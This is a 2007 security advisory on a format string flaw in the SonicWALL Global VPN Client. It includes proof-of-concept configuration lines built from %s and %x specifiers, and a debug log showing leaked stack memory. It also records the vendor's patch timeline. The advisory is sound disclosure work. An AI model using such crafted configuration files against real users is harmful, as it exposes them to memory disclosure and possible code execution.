SEC Consult Security Advisory < 20071204-0 >
=====================================================================================
title: SonicWALL Global VPN Client Format String Vulnerability
program: SonicWALL Global VPN Client
vulnerable version: < 4.0.0.830
homepage: www.sonicwall.com
found: 06-12-2007
by: lofi42*
=====================================================================================
Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.
Vulnerabilty overview:
---------------
SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file.
Vulnerability details:
---------------
Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "Hostname" Tags in the configuration file.
Examples:
<Connection name=%s%s%s%s>
<HostName>%s%s%s%s</HostName>
The bugs has been verified in version 3.1.556 and 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version beta 4.0.0.810, the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log.
Proof-of-concept:
---------------
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...
<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
...yields the following logfile:
----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
----------------------</Connection name >-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------
vendor status:
---------------
vendor notified: 2007-08-16
vendor response: 2007-08-29
patch available: 2007-11-26
The issue has been fixed in SonicWall VPN client 4.0.0.830.